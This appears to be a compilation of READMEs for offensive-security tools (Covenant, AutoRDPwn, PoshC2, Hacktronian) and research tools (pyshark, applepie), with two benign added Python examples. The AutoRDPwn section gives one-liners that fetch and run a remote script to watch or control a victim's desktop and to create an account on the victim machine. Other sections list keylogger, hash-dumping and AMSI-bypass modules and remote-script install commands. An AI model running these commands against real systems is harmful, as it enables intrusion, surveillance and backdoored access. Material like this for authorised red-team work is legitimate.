Covenant

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.

Quick-Start Guide

Please see the Installation and Startup guide to get started with Covenant! The Wiki documents most of Covenant's core features and how to use them.

Features

Covenant has several key features that make it useful and differentiate it from other command and control frameworks:

- Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation.
- Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has Docker support, allowing it to run within a container on any system that has Docker installed.
- Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
- API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
- Listener Profiles – Covenant supports listener "profiles" that control how the network communication between Grunt implants and Covenant listeners looks on the wire.
- Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
- Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
- Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
- Tracking Indicators – Covenant tracks "indicators" throughout an operation and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in its infancy and still has room for improvement.
- Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I've found it very convenient to write the server, client, and implant all in the same language. This may not be a true "feature", but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion

Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.

Download Covenant

AutoRDPwn

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself. Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages. Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

PowerShell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script

*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between machines. When used remotely in a reverse shell, it is necessary to use the following parameters:

-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional; the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:

powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on one line:

powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher

And many more that do not fit here. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can contact through [email protected]

Download AutoRDPwn

PoshC2

PoshC2 is a proxy-aware C2 framework that utilises PowerShell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. PowerShell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third-party libraries to the framework. In addition to the PowerShell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix-based systems such as Mac OS or Ubuntu. The server-side component is written in Python for cross-platform portability and speed; a PowerShell server component still exists and can be installed using the 'Windows Install' as shown below, but will not be maintained with future updates and releases.

Linux Install (Python3)

Automatic install for Python3 using curl & bash:

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash

Manual install for Python3:

wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh
chmod +x ./Install.sh
./Install.sh

Linux Install (Python2) – stable but unmaintained

Automatic install for Python2 using curl & bash:

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash

Manual install for Python2:

wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh
chmod +x ./Install.sh
./Install.sh

Windows Install

Install Git and Python (and ensure Python is in the PATH), then run:

powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1')"

Using older versions

You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing:

git tag --list

or by viewing them online. Then you can use the install one-liner but replace the branch name with the tag:

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/<tag>/Install.sh | bash

For example:

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash

Offline

If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use:

git reset --hard <tag>

For example:

git reset --hard v4.8

However, note that this will overwrite any local changes to files, such as Config.py, and you may have to re-run the install script for that version or re-set up the environment appropriately.

Running PoshC2

Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use --nano to open it in nano.

Run the server using posh-server or:

python3 -u C2Server.py | tee -a /var/log/poshc2_server.log

Others can view the log using posh-log or:

tail -n 5000 -f /var/log/poshc2_server.log

Interact with the implants using the handler, run by using posh or:

python3 ImplantHandler.py

Installing as a service

Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot.

Add the file in systemd (this is automatically done via the install script):

cp poshc2.service /lib/systemd/system/poshc2.service

Start the service:

posh-service

View the log:

posh-log

Or alternatively use journalctl (but note this can be rate limited):

journalctl -n 20000 -u poshc2.service -f --output cat

Note that re-running posh-service will restart the service. Running posh-service will automatically start to display the log, but Ctrl-C will not stop the service, only quit the log; posh-log can be used to re-view the log at any point. posh-stop-service can be used to stop the service.

Issues / FAQs

If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn't have what you're looking for please open a new issue and we will try to resolve the issue asap. If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the Slack channel below.

License / Terms of Use

This software should only be used for authorised testing activity and not for malicious use. By downloading this software you are accepting the terms of use and the licensing agreement.

Documentation

We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/

Find us on #Slack – poshc2.slack.com (to request an invite send an email to [email protected])

Known issues

Error encrypting value: object type

If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system. Try creating a virtualenv in Python and re-install the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you've finished in this virtualenv. For example:

pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt
python C2Server.py

Note that any time you run PoshC2 you have to reactivate the virtual environment and run it in that. The use of a virtual environment is abstracted if you use the posh- scripts on *nix.

Download PoshC2_Python

Hacktronian

Pentesting Tools That All Hackers Need.

HACKTRONIAN Menu:
- Information Gathering
- Password Attacks
- Wireless Testing
- Exploitation Tools
- Sniffing & Spoofing
- Web Hacking
- Private Web Hacking
- Post Exploitation
- Install The HACKTRONIAN

Information Gathering:
- Nmap
- Setoolkit
- Port Scanning
- Host To IP
- wordpress user
- CMS scanner
- XSStrike
- Dork – Google Dorks Passive Vulnerability Auditor
- Scan A server's Users
- Crips

Password Attacks:
- Cupp
- Ncrack

Wireless Testing:
- reaver
- pixiewps
- Fluxion

Exploitation Tools:
- ATSCAN
- sqlmap
- Shellnoob
- commix
- FTP Auto Bypass
- jboss-autopwn

Sniffing & Spoofing:
- Setoolkit
- SSLtrip
- pyPISHER
- SMTP Mailer

Web Hacking:
- Drupal Hacking
- Inurlbr
- WordPress & Joomla Scanner
- Gravity Form Scanner
- File Upload Checker
- WordPress Exploit Scanner
- WordPress Plugins Scanner
- Shell and Directory Finder
- Joomla! 1.5 – 3.4.5 remote code execution
- Vbulletin 5.X remote code execution
- BruteX – Automatically brute force all services running on a target
- Arachni – Web Application Security Scanner Framework

Private Web Hacking:
- Get all websites
- Get joomla websites
- Get wordpress websites
- Control Panel Finder
- Zip Files Finder
- Upload File Finder
- Get server users
- SQli Scanner
- Ports Scan (range of ports)
- Ports Scan (common ports)
- Get server Info
- Bypass Cloudflare

Post Exploitation:
- Shell Checker
- POET
- Weeman

Installation in Linux:

This Tool Must Run As ROOT !!!

git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
./install.sh

That's it.. you can execute the tool by typing hacktronian

Installation in Android:

Open Termux, then:

pkg install git
pkg install python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py

Video Tutorial

Download Hacktronian

pyshark

Python wrapper for tshark, allowing Python packet parsing using Wireshark dissectors.

Extended documentation: http://kiminewt.github.io/pyshark

Python2 deprecation – This package no longer supports Python2. If you wish to still use it in Python2, you can:
- Use version 0.3.8
- Install pyshark-legacy via pypi
- Clone the pyshark-legacy repo (https://github.com/KimiNewt/pyshark-legacy), where bugfixes will be applied.

Looking for contributors – for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull requests will be reviewed and if anyone is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few Python packet parsing modules; this one is different because it doesn't actually parse any packets, it simply uses tshark's (the Wireshark command-line utility) ability to export XMLs to use its parsing. This package allows parsing from a capture file or a live capture, using all Wireshark dissectors you have installed. Tested on Windows/Linux.

Installation

All Platforms

Simply run the following to install the latest from pypi:

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml, which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept an EULA for XCode, so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
>>> print(cap[0])
Packet (Length: 698)
Layer ETH:
    Destination: BLANKED
    Source: BLANKED
    Type: IP (0x0800)
Layer IP:
    Version: 4
    Header Length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
    Total Length: 684
    Identification: 0x254f (9551)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 1
    Protocol: UDP (17)
    Header checksum: 0xe148 [correct]
    Source: BLANKED
    Destination: BLANKED
...

Other options:
- keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
- input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
- display_filter: A display (Wireshark) filter to apply on the cap before reading it.
- only_summaries: Only produce packet summaries, much faster but includes very little information.
- disable_protocol: Disable detection of a protocol (tshark > version 2).
- decryption_key: Key used to encrypt and decrypt captured traffic.
- encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'). Defaults to WPA-PSK.
- tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
>>> capture[3]

for packet in capture.sniff_continuously(packet_count=5):
    print('Just arrived:', packet)

Other options:
- interface: Name of the interface to sniff on. If not given, takes the first available.
- bpf_filter: BPF filter to use on packets.
- display_filter: Display (Wireshark) filter to use.
- only_summaries: Only produce packet summaries, much faster but includes very little information.
- disable_protocol: Disable detection of a protocol (tshark > version 2).
- decryption_key: Key used to encrypt and decrypt captured traffic.
- encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'). Defaults to WPA-PSK.
- tshark_path: Path of the tshark binary.
- output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer:

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
>>> capture[3]

for packet in capture.sniff_continuously(packet_count=5):
    print('Just arrived:', packet)

Other options:
- ring_file_size: Size of the ring file in kB, default is 1024.
- num_ring_files: Number of ring files to keep, default is 1.
- ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap.
- interface: Name of the interface to sniff on. If not given, takes the first available.
- bpf_filter: BPF filter to use on packets.
- display_filter: Display (Wireshark) filter to use.
- only_summaries: Only produce packet summaries, much faster but includes very little information.
- disable_protocol: Disable detection of a protocol (tshark > version 2).
- decryption_key: Key used to encrypt and decrypt captured traffic.
- encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'). Defaults to WPA-PSK.
- tshark_path: Path of the tshark binary.
- output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options:
- remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
- remote_interface: The remote interface on the remote machine to capture on. Note that on Windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
- remote_port: The remote port the rpcapd service is listening on.
- bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
- only_summaries: Only produce packet summaries, much faster but includes very little information.
- disable_protocol: Disable detection of a protocol (tshark > version 2).
- decryption_key: Key used to encrypt and decrypt captured traffic.
- encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'). Defaults to WPA-PSK.
- tshark_path: Path of the tshark binary.

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers; first you have to reach the appropriate layer and then you can select your field. All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Download Pyshark
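The README above says pyshark does no parsing of its own and instead consumes the XML that tshark exports (the PDML format produced by `tshark -T pdml`). The following is an added example, not pyshark's own code, that shows the mechanism behind the access style in the "Accessing packet data" section: a small PDML walker where each `<proto>` becomes a layer and each `<field>` an attribute, so `packet['ip'].dst`, `packet.ip.src`, `'IP' in packet`, `.showname`, `.int_value` and `.binary_value` work as shown. `SAMPLE_PDML` is a constructed, abbreviated export with invented addresses so the script runs offline without tshark; the class and function names are this example's own.

```python
# Added example, not pyshark's own code: the mechanism the README describes. tshark exports
# PDML (-T pdml); the wrapper turns each <proto> into a layer and each <field> into an
# attribute, giving packet['ip'].dst, packet.ip.src, 'IP' in packet, .showname, .int_value
# and .binary_value. SAMPLE_PDML is a constructed, abbreviated export with invented addresses.
import xml.etree.ElementTree as ET

SAMPLE_PDML = """<pdml version="0" creator="wireshark/3.0.0">
<packet>
  <proto name="geninfo" showname="General information" size="698" pos="0">
    <field name="len" pos="0" show="698" showname="Frame Length" value="2ba" size="698"/>
  </proto>
  <proto name="eth" showname="Ethernet II" size="14" pos="0">
    <field name="eth.src" showname="Source: 66:77:88:99:aa:bb" size="6" pos="6" show="66:77:88:99:aa:bb" value="66778899aabb"/>
  </proto>
  <proto name="ip" showname="Internet Protocol Version 4" size="20" pos="14">
    <field name="ip.src" showname="Source: 192.168.0.100" size="4" pos="26" show="192.168.0.100" value="c0a80064"/>
    <field name="ip.dst" showname="Destination: 192.168.0.1" size="4" pos="30" show="192.168.0.1" value="c0a80001"/>
  </proto>
  <proto name="udp" showname="User Datagram Protocol" size="8" pos="34">
    <field name="udp.dstport" showname="Destination Port: 5353" size="2" pos="36" show="5353" value="14e9"/>
  </proto>
</packet>
</pdml>
"""


class Field:
    """One <field>: pretty `showname`, decoded `show`, raw hex `value`."""
    def __init__(self, elem):
        self.showname = elem.get("showname", "")
        self.show = elem.get("show", "")
        self.raw_value = elem.get("value", "")

    @property
    def int_value(self):          # raw bytes read as a big-endian integer
        return int(self.raw_value, 16)

    @property
    def binary_value(self):       # raw bytes as they were on the wire
        return bytes.fromhex(self.raw_value)

    def __str__(self):
        return self.show


class Layer:
    """One <proto>: fields keyed with the protocol prefix stripped (ip.src -> src)."""
    def __init__(self, elem):
        self.layer_name = elem.get("name")
        prefix = self.layer_name + "."
        self._fields = {}
        for f in elem.iter("field"):
            name = f.get("name") or ""
            short = name[len(prefix):] if name.startswith(prefix) else name
            self._fields.setdefault(short, Field(f))   # first occurrence wins, as in pyshark

    @property
    def field_names(self):
        return sorted(self._fields)

    def __getattr__(self, name):  # only reached for names that are not real attributes
        fields = self.__dict__.get("_fields", {})
        if name in fields:
            return fields[name]
        raise AttributeError(name)


class Packet:
    """One <packet>: layers by index, by name (case-insensitive) or as attributes.
    geninfo is frame metadata rather than a protocol, so it only feeds `length`."""
    def __init__(self, elem):
        self.layers, self.length = [], None
        for proto in elem.findall("proto"):
            if proto.get("name") == "geninfo":
                length = proto.find("field[@name='len']")
                self.length = int(length.get("show")) if length is not None else None
            else:
                self.layers.append(Layer(proto))

    def __getitem__(self, key):
        if isinstance(key, int):
            return self.layers[key]
        for layer in self.layers:
            if layer.layer_name == key.lower():
                return layer
        raise KeyError(key)

    def __contains__(self, name):
        return any(layer.layer_name == name.lower() for layer in self.layers)

    def __getattr__(self, name):
        for layer in self.__dict__.get("layers", []):
            if layer.layer_name == name.lower():
                return layer
        raise AttributeError(name)


def parse_pdml(text):
    """Parse a PDML document into Packet objects (what FileCapture does with tshark's output)."""
    return [Packet(p) for p in ET.fromstring(text).findall("packet")]


def summaries(packets):
    """One line per packet: the kind of view only_summaries=True trades field detail for."""
    return [f"{p.ip.src} -> {p.ip.dst} {p.layers[-1].layer_name.upper()} len={p.length}"
            for p in packets if "ip" in p]
```

Feeding a real export is a matter of replacing `SAMPLE_PDML` with the output of `tshark -r capture.pcap -T pdml`; the `showname` strings are exactly what pyshark prints when you `print(cap[0])`, and `value` is the hex that backs `binary_value`.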

applepie

Hello! Welcome to applepie! This is a tool designed for fuzzing, introspection, and finding bugs! This is a hypervisor using the Windows Hypervisor Platform API present in recent versions of Windows (specifically this was developed and tested on Windows 10 17763). Bochs is used for providing deep introspection and device emulation.

The Windows Hypervisor Platform API (WHVP) is an API set for accessing Hyper-V's hypervisor abilities. This API makes it easy for us to implement a virtual machine all in user-space without any special drivers or permissions needed.

Recent Feature Demo

Binary Coverage Example

What is this for?

This is a tool designed for fuzzing and introspection during security research. By using a hypervisor, common fuzzing techniques can be applied to any target, kernel or userland. This environment allows fuzzing of whole systems without a need for source of the target.

At the hypervisor level code coverage can be gathered, and if needed Bochs emulation can be used to provide arbitrary introspection in an emulation environment. This coverage information can be used to figure out the effectiveness of the fuzz cases. A fuzz case that caused an increase in coverage can be saved as an interesting case. This input can be used later, built on by new corruptions.

Snapshot fuzzing is the primary use of this tool: you take a snapshot of a system in a certain state and save it off. This snapshot can then be loaded up for fuzzing, where a fuzz case is injected and execution is resumed. Since the VM can be reset very cheaply, the VM can be reset often. If it takes Word 5 seconds to boot, but you can snapshot it right as it reads your file, you can cut the fuzz case down to only what is relevant to an input. This allows for a very tight loop of fuzzing without needing to have access to source. Since the VMs are entirely separate systems, many can be run in parallel to allow scaling to all cores.

Currently this tool only supports gathering code coverage, dynamic symbol downloading for Windows, and symbol/module parsing for Windows targets as well. Adding fuzzing support will be quite soon.

Development cycle

Given I've written almost all the features here before (coverage, fuzzing, fast resets, etc.), I expect this project should pretty quickly become ready for fuzzing, unless I get distracted 😀 I'm aiming for end-of-January for coverage (done!), feedback, module listings (done!), process lists, fast resets, and symbol support (done!). Which would make it a very capable fuzzer.

OS Support

The main supported target is modern Windows 10. Windows targets have downloading of symbols from the symbol store. This allows for symbolic coverage in Windows targets out of the box. However, the code is written in a way that Linux enlightenment can easily be added. Without any enlightenment, any OS that boots can still be fuzzed and basic coverage can be gathered.

Before reporting OS support issues please validate that the issue is in the hypervisor/changes to Bochs by trying to boot your target using standard prebuilt Bochs with no hypervisor. Bochs is not commonly used and can frequently have breaking bugs for even common things like booting Linux, especially with the rapid internal changes to CPUID/MSR usages with Spectre/Meltdown mitigations going into OSes.

Issues

See the issues page on Github for a list of issues. I've seeded it with a few already. Some of these need to be addressed quickly before fuzzing development starts.

Building

Build Prereqs

To build this you need a few things:
- Recently updated MSVC compiler (Visual Studio 2017)
- Nightly Rust (https://rustup.rs/, must be nightly)
- Python (I used 3 but 2 should work too)
- 64-bit Cygwin with autoconf and GNU make packages installed
- Hyper-V installed and a recent build of Windows 10

MSVC

Install Visual Studio 2017 and make sure it's updated. We're using some bleeding edge APIs, headers, and libraries here. I was using cl.exe version:

Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64

and SDK version 10.0.17763.0.

Nightly Rust

Install Rust via https://rustup.rs/. I used rustc 1.32.0-nightly (b3af09205 2018-12-04). Make sure you install the x86_64-pc-windows-msvc toolchain as only 64-bit is supported for this project. Make sure cargo is in your path. This should be the default.

Python

Go grab Python from https://www.python.org/ and make sure it's in your PATH such that python can be invoked.

Cygwin

Install 64-bit Cygwin (https://www.cygwin.com/setup-x86_64.exe) specifically to C:\cygwin64. When installing Cygwin make sure you install the autoconf and make packages.

Hyper-V

Go into "Turn Windows features on or off" and tick the checkbox next to "Hyper-V" and "Windows Hypervisor Platform". This requires of course that your computer supports Hyper-V.

Step-by-step build process

This install process guide was verified on the following:
- Clean install of Windows 10, Build 17763
- rustc 1.33.0-nightly (8e2063d02 2019-01-07)
- Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64
- Visual Studio Community 2017 version 15.9.4
- applepie commit `f84c084feb487e2e7f31f9052a4ab0addd2c4cf9`
- Python 3.7.2 x64
- git version 2.20.1.windows.1

- Make sure Windows 10 is fully up to date. We use some bleeding edge features with WHVP and only the latest Windows 10 is tested.
- In "Turn Windows features on or off", tick "Hyper-V" and "Windows Hypervisor Platform", then click OK to install and reboot.
- Install VS Community 2017 and the updated "Desktop development with C++" workload.
- Install Rust nightly for x86_64-pc-windows-msvc.
- Install Git. Configure git to checkout as-is, commit unix-style (core.autocrlf=input). If git converts on checkout the ./configure script will fail for Bochs due to CRLF line endings. You can also use checkout as-is, commit as-is (core.autocrlf=false).
- Install Cygwin x64 via setup-x86_64.exe to "C:\cygwin64", with the autoconf package and GNU make (the make package).
- Install Python. I installed Python 3 x64 and added it to PATH. Python 2 and 32-bit versions should be fine; we just use Python for our build script.
- Open a "x64 Native Tools Command Prompt for VS 2017".
- Checkout applepie via git clone https://github.com/gamozolabs/applepie and cd into applepie.
- Run python build.py. This will first check for some basic system requirements, then build the Rust bochservisor DLL, then configure Bochs via autoconf, and then build Bochs with GNU make from Cygwin. This initial build process may take about 2 minutes; on a modern machine it's likely 20-30 seconds.

Actually Building

Just run python build.py from the root directory of this project. It should check for sanity of the environment and everything should "just work".

Cleaning

Run python build.py clean to clean Bochs and Rust binaries. Run python build.py deepclean to completely remove all Bochs and Rust binaries; it also removes all the configuration for Bochs. Use this if you reconfigure Bochs in some way.

Usage

Read up on Bochs configuration to figure out how to set up your environment. We have a few requirements, like sync=none, ips=1000000, and currently single processor support only. These are enforced inside of the code itself to make sure you don't shoot yourself in the foot. Use the included bochservisor_test\bochsrc.bxrc and bochservisor_test_real\bochsrc.bxrc configurations as examples. bochservisor_test_real is likely the most up to date config you should look at as reference.

Coverage

Windows targets have module list enlightenment, which allows us to see the listings for all the modules in the context we are running in. With this we can convert the instruction addresses to module + offset. This module + offset helps keep coverage information between fuzz cases where ASLR state changes. It also allows for the module to be colored in a tool like IDA to visually see what code has been hit.
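The module + offset idea in the paragraph above, as an added example that is not applepie's code: instruction addresses from a guest are rebased against that fuzz case's module list, so the coverage set is keyed by (module, offset) and two runs of the same code under different ASLR layouts produce no spurious "new" coverage. The module bases, sizes and trace addresses are constructed sample values, and `ModuleMap`, `Coverage` and `run_demo` are names introduced here.

```python
# Added example, not applepie's code: module-relative coverage as the README describes it.
# Absolute guest instruction addresses are rebased to (module, offset) with the guest's
# module list, so hits stay comparable across fuzz cases even when ASLR moves the modules.
# Module bases, sizes and trace addresses below are constructed sample values.
from bisect import bisect_right


class ModuleMap:
    """Module list for one fuzz case: (base, size, name) triples, sorted by base."""
    def __init__(self, modules):
        self.modules = sorted(modules)
        self.bases = [base for base, _, _ in self.modules]

    def rebase(self, address):
        """(module_name, offset) for an address inside a known module, else (None, address)."""
        idx = bisect_right(self.bases, address) - 1
        if idx >= 0:
            base, size, name = self.modules[idx]
            if address < base + size:
                return name, address - base
        return None, address


class Coverage:
    """Set of (module, offset) pairs accumulated over every fuzz case."""
    def __init__(self):
        self.seen = set()

    def record(self, module_map, trace):
        """Fold one case's trace in; the count of new pairs is the 'interesting case' signal."""
        before = len(self.seen)
        self.seen.update(module_map.rebase(a) for a in trace)
        return len(self.seen) - before

    def per_module(self):
        counts = {}
        for name, _ in self.seen:
            key = name or "<unknown>"
            counts[key] = counts.get(key, 0) + 1
        return counts

    def export(self):
        """'module+0xoffset' lines, the form a disassembler colouring plugin consumes."""
        return sorted(f"{name}+0x{off:x}" for name, off in self.seen if name is not None)


# Two fuzz cases of the same target: the same code runs, but the loader placed the
# modules at different bases (constructed ASLR slides). 0x1234 is outside every module.
CASE1_MODULES = ModuleMap([(0x7FF8_0000_0000, 0x20_0000, "ntdll.dll"),
                           (0x7FF8_1000_0000, 0x0C_0000, "kernel32.dll")])
CASE2_MODULES = ModuleMap([(0x7FF9_4000_0000, 0x20_0000, "ntdll.dll"),
                           (0x7FF9_2000_0000, 0x0C_0000, "kernel32.dll")])
CASE1_TRACE = [0x7FF8_0000_1000, 0x7FF8_0000_1005, 0x7FF8_1000_2000, 0x1234]
CASE2_TRACE = [0x7FF9_4000_1000, 0x7FF9_4000_1005, 0x7FF9_2000_2000, 0x1234]


def run_demo():
    """Return (new coverage per case, Coverage); the second case adds nothing because
    the absolute addresses changed but module+offset did not."""
    cov = Coverage()
    gains = [cov.record(CASE1_MODULES, CASE1_TRACE), cov.record(CASE2_MODULES, CASE2_TRACE)]
    return gains, cov


if __name__ == "__main__":
    gains, cov = run_demo()
    print("new coverage per case:", gains)
    print(cov.per_module())
    print("\n".join(cov.export()))
```

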